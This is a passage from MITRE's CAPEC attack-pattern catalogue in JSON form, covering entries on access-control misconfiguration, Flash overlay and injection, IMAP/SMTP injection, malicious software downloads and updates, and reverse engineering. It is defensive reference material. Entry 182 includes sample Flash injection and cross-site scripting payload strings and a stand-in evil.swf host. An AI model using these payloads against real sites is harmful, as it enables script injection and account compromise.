SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"554"}},"Prerequisites":{"Prerequisite":"The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern."},"Resources_Required":{"Resource":"The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},"Previous_Entry_Name":["Discovering, querying, and finally calling micro-services, such as w/ AJAX",{"Date":"2015-12-07"}]}},"180":{"ID":"180","Name":"Exploiting Incorrectly Configured Access Control Security Levels","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, \\"Accessing Functionality Not Properly Constrained by ACLs\\" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"17"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user.","Technique":["Spider the web site for all available links.","Brute force to guess all function names/action with different privileges."]},{"Step":"2","Phase":"Experiment","Description":"[Identify weak points in access control configurations] The attacker probes the access control for functions and data identified in the Explore phase to identify potential weaknesses in how the access controls are configured.","Technique":["The attacker attempts authenticated access to targeted functions and data.","The attacker attempts unauthenticated access to targeted functions and data.","The attacker attempts indirect and side channel access to targeted functions and data."]},{"Step":"3","Phase":"Exploit","Description":"[Access the function or data bypassing the access control] The attacker executes the function or accesses the data identified in the Explore phase bypassing the access control.","Technique":"The attacker executes the function or accesses the data not authorized to them."}]},"Prerequisites":{"Prerequisite":"The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker\'s access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity.."},"Skills_Required":{"Skill":["In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Authorization","Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":"Design: Configure the access control correctly."},"Example_Instances":{"Example":"For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"1190"},{"CWE_ID":"1193"},{"CWE_ID":"1220"},{"CWE_ID":"1268"},{"CWE_ID":"1280"},{"CWE_ID":"1297"},{"CWE_ID":"1311"},{"CWE_ID":"1315"},{"CWE_ID":"1318"},{"CWE_ID":"1320"},{"CWE_ID":"1321"}]},"References":{"Reference":[{"External_Reference_ID":"REF-29"},{"External_Reference_ID":"REF-30","Section":"OWASP Top 10 2007 A3 \u2013 Malicious File Execution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}]}},"181":{"ID":"181","Name":"Flash File Overlay","Abstraction":"Detailed","Status":"Draft","Description":"An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"103","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":["The victim must be tricked into navigating to the attackers\' decoy site and performing the actions on the decoy page.","The victim\'s browser must support invisible Flash overlays."]},"Resources_Required":{"Resource":"The attacker must be able to force the Flash overlay over the decoy content."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"182":{"ID":"182","Name":"Flash Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"137"},{"Nature":"CanAlsoBe","CAPEC_ID":"248"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find Injection Entry Points] The attacker first takes an inventory of the entry points of the application.","Technique":["Spider the website for all available URLs that reference a Flash application.","List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies."]},{"Step":"2","Phase":"Experiment","Description":"[Determine the application\'s susceptibility to Flash injection] Determine the application\'s susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.","Technique":["Test the page using direct load asfunction, getURL,javascript:gotRoot(\\"\\")///d.jpg","Test the page using controlled evil page/host, http://example.com/evil.swf","Test the page using Flash HTML injection, \\"\'><img src=\'asfunction:getURL,javascript:gotRoot(\\"\\")//.jpg\' >","Test the page using DOM injection, (gotRoot(\'\'))"]},{"Step":"3","Phase":"Exploit","Description":"[Inject malicious content into target] Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase"}]},"Prerequisites":{"Prerequisite":"The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of Flash, especially how to insert content the executes commands.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The attacker may need to be able to serve the injected Flash content."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: remove sensitive information such as user name and password in the SWF file.","Implementation: use validation on both client and server side.","Implementation: remove debug information.","Implementation: use SSL when loading external data","Implementation: use crossdomain.xml file to allow the application domain to load stuff or the SWF file called by other domain."]},"Example_Instances":{"Example":{"p":["In the following example, the SWF file contains","A request like","becomes"],"div":["getURL(\'javascript:SomeFunc(\\"someValue\\")\',\'\',\'GET\')",{"style":"margin-left:10px;","class":"informative"},"http://example.com/noundef.swf?a=0:0;alert(\'XSS\')",{"style":"margin-left:10px;","class":"informative"},"javascript:SomeFunc(\\"someValue\\")?a=0:0;alert(123)",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"184"},{"CWE_ID":"697"}]},"References":{"Reference":[{"External_Reference_ID":"REF-46"},{"External_Reference_ID":"REF-47"},{"External_Reference_ID":"REF-48"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"}]}},"183":{"ID":"183","Name":"IMAP/SMTP Command Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits weaknesses in input validation on IMAP/SMTP servers to execute commands on the server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Prerequisites":{"Prerequisite":["The target environment must consist of a web-mail server that the attacker can query and a back-end mail server. The back-end mail server need not be directly accessible to the attacker.","The web-mail server must fail to adequately sanitize fields received from users and passed on to the back-end mail server.","The back-end mail server must not be adequately secured against receiving malicious commands from the web-mail server."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. However, in most cases, the attacker will need to be a recognized user of the web-mail server."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"77"}},"References":{"Reference":{"External_Reference_ID":"REF-49","Section":"Testing for IMAP SMTP Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"184":{"ID":"184","Name":"Software Integrity Attack","Abstraction":"Meta","Status":"Draft","Description":"An attacker initiates a series of events designed to cause a user, program, server, or device to perform actions which undermine the integrity of software code, device data structures, or device firmware, achieving the modification of the target\'s integrity to achieve an insecure state.","Typical_Severity":"Low","Skills_Required":{"Skill":["Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Software Integrity Attacks are usually a late stage focus of attack activity which depends upon the success of a chain of prior events. The resources required to perform the attack vary with respect to the overall attack strategy, existing countermeasures which must be bypassed, and the success of early phase attack vectors."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"}],"Previous_Entry_Name":["Software Integrity Attacks",{"Date":"2015-11-09"}]}},"185":{"ID":"185","Name":"Malicious Software Download","Abstraction":"Standard","Status":"Draft","Description":"An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"184","Exclude_Related":{"Exclude_ID":"403"}},{"Nature":"CanPrecede","CAPEC_ID":"662"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1105","Entry_Name":"Ingress Tool Transfer"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"186":{"ID":"186","Name":"Malicious Software Update","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an adversary controlled source. Although there are several variations to this strategy of attack, the attack methods are united in that all rely on the ability of an adversary to position and disguise malicious content such that it masquerades as a legitimate software update which is then processed by a program, undermining application integrity. As such the attack employs \'spoofing\' techniques augmented by psychological or technological mechanisms to disguise the update and/or its source. Virtually all software requires frequent updates or patches, giving the adversary immense latitude when structuring the attack, as well as many targets of opportunity. Automated attacks involving malicious software updates require little to no user-directed activity and are therefore advantageous because they avoid the complex preliminary setup stages of manual attacks, which must effectively \'hook\' users while avoiding countermeasures such as spam filters or web security filters.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"184"},{"Nature":"CanFollow","CAPEC_ID":"98"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target] The adversary must first identify what they want their target to be. Because malicious software updates can be carried out in a variety of ways, the adversary will first not only identify a target program, but also what users they wish to target. This attack can be targeted (a particular user or group of users) or untargeted (many different users)."},{"Step":"2","Phase":"Experiment","Description":"[Craft a deployment mechanism based on the target] The adversary must craft a deployment mechanism to deploy the malicious software update. This mechanism will differ based on if the attack is targeted or untargeted.","Technique":["Targeted attack: hosting what appears to be a software update, then harvesting actual email addresses for an organization, or generating commonly used email addresses, and then sending spam, phishing, or spear-phishing emails to the organization\'s users requesting that they manually download and install the malicious software update.","Targeted attack: Instant Messaging virus payload, which harvests the names from a user\'s contact list and sends instant messages to those users to download and apply the update","Untargeted attack: Spam the malicious update to as many users as possible through unsolicited email, instant messages, or social media messages.","Untargeted attack: Send phishing emails to as many users as possible and pretend to be a legitimate source suggesting to download an important software update.","Untargeted attack: Use trojans/botnets to aid in either of the two untargeted attacks."]},{"Step":"3","Phase":"Exploit","Description":"[Deploy malicious software update] Using the deployment mechanism from the previous step, the adversary gets a user to install the malicious software update."}]},"Skills_Required":{"Skill":["This attack requires advanced cyber capabilities",{"Level":"High"}]},"Resources_Required":{"Resource":"Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code."},"Consequences":{"Consequence":{"Scope":["Access Control","Availability","Confidentiality"],"Impact":"Execute Unauthorized Commands","Note":"Utilize the built-in software update mechanisms of the commercial components to deliver software that could compromise security credentials, enable a denial-of-service attack, or enable tracking."}},"Mitigations":{"Mitigation":"Validate software updates before installing."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Notes":{"Note":["Other class of attacks focus on firmware, where malicious updates are made to the core system firmware or BIOS. Since this occurs outside the controls of the operating system, the OS detection and prevention mechanisms do not aid, thus allowing an adversary to evade defenses as well as gain persistence on the target\'s system.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"}]}},"187":{"ID":"187","Name":"Malicious Automated Software Update via Redirection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits two layers of weaknesses in server or client software for automated update mechanisms to undermine the integrity of the target code-base. The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update. One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers\' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as \'evil twin\' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains. The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers\' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186","Exclude_Related":{"Exclude_ID":"403"}}},"Consequences":{"Consequence":{"Scope":["Access Control","Availability","Confidentiality"],"Impact":"Execute Unauthorized Commands"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1072","Entry_Name":"Software Deployment Tools"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Architectural_Paradigms, Injection_Vector, Payload, Payload_Activation_Impact, References, Technical_Context"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Consequences, Description, Likelihood_Of_Attack, Taxonomy_Mappings"}],"Previous_Entry_Name":["Malicious Automated Software Update",{"Date":"2020-12-17"}]}},"188":{"ID":"188","Name":"Reverse Engineering","Abstraction":"Meta","Status":"Stable","Description":"An adversary discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or \\"back engineer\\" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices, or software, although the methodology and techniques involved in each type of analysis differ widely.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Prerequisites":{"Prerequisite":"Access to targeted system, resources, and information."},"Skills_Required":{"Skill":["Understanding of low level programming languages or technologies can be very helpful. For example, when reverse engineering a binary file, an understanding of assembly languages can help to determine the purpose and inner-workings of the code. Another example is reverse engineering an application that relies on networking. Here, an understanding networking protocols can provide insight into application details.",{"Level":"High"}]},"Resources_Required":{"Resource":"The technical resources necessary to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed."},"Mitigations":{"Mitigation":"Employ code obfuscation techniques to prevent the adversary from reverse engineering the targeted entity."},"Example_Instances":{"Example":"When adversaries are reverse engineering software, methodologies fall into two broad categories, \'white box\' and \'black box.\' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. \'Black Box\' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs."},"References":{"Reference":{"External_Reference_ID":"REF-50","Section":"Reverse engineering"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"}]}},"189":{"ID":"189","Name":"Black Box Reverse Engineering","Abstraction":"Standard","Status":"Draft","Description":"An attacker discovers the structure, function, and composition of a type of computer software through black box analysis techniques. \'Black Box\' methods involve interacting with the software indirectly, in the absence of direct access to the executable object. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"188"}},"Resources_Required":{"Resource":"Black box methods require (at minimum) the ability to interact with the functional boundaries where the software communicates with a larger processing environment, such as inter-process communication on a host operating system, or via networking protocols."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"203"},{"CWE_ID":"1255"},{"CWE_ID":"1300"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Software Reverse Engineering",{"Date":"2015-11-09"}]}},"190":{"ID":"190","Name":"Reverse Engineer an Executable to Expose Assumed Hidden Functionality","Abstraction":"Detailed","Status":"Draft","Description":"An attacker analyzes a binary file or executable for the purpose of discovering the structure, function, and possibly source-code of the file by using a variety of analysis techniques to effectively determine how the software functions and operates. This type of analysis is also referred to as Reverse Code Engineering, as techniques exist for extracting source code from an executable. Several techniques are often employed for this purpose, both black box and white box. The use of computer bus analyzers and packet sniffers allows the binary to be studied at a level of interactions with its computing environment, such as a host OS, inter-process communication, and/or network communication. This type of analysis falls into the \'black box\' category because it involves behavioral analysis of the software without reference to source code, object code, or protocol specifications.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"167","Exclude_Related":{"Exclude_ID":"515"}}},"Resources_Required":{"Resource":"Access to the target file such that it can be analyzed with the appropriate tools. A range of tools suitable for analyzing an executable or its operations"},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"912"}},"References":{"Reference":[{"External_Reference_ID":"REF-51","Section":"Decompiler"},{"External_Reference_ID":"REF-52","Section":"Debugger"},{"External_Reference_ID":"REF-53","Section":"Disassembler"}]},"Notes":{"Note":{"Type":"Other","p":["White box analysis techniques include file or binary analysis, debugging, disassembly, and decompilation, and generally fall into categories referred to as \'static\' and \'dynamic\' analysis. Static analysis encompasses methods which analyze the binary, or extract its source code or object code without executing the program. Dynamic analysis involves analyzing the program during execution.","Some forms of file analysis tools allow the executable itself to be analyzed, the most basic of which can analyze features of the binary. More sophisticated forms of static analysis analyze the binary file and extract assembly code, and possibly source code representations, from analyzing the structure of the file itself. Dynamic analysis tools execute the binary file and monitor its in memory footprint, revealing its execution flow, memory usage, register values, and machine instructions. This type of analysis is most effective for analyzing the execution of binary files whose content has been obfuscated or encrypted in its native executable form.","Debuggers allow the program\'s execution to be monitored, and depending upon the debugger\'s sophistication may show relevant source code for each step in execution, or may display and allow interactions with memory, variables, or values generated by the program during run-time operations. Disassemblers operate in reverse of assemblers, allowing assembly code to be extracted from a program as it executes machine code instructions. Disassemblers allow low-level interactions with the program as it executes, such as manipulating the program\'s run time operations. Decompilers can be utilized to analyze a binary file and extract source code from the compiled executable. Collectively, the tools and methods described are those 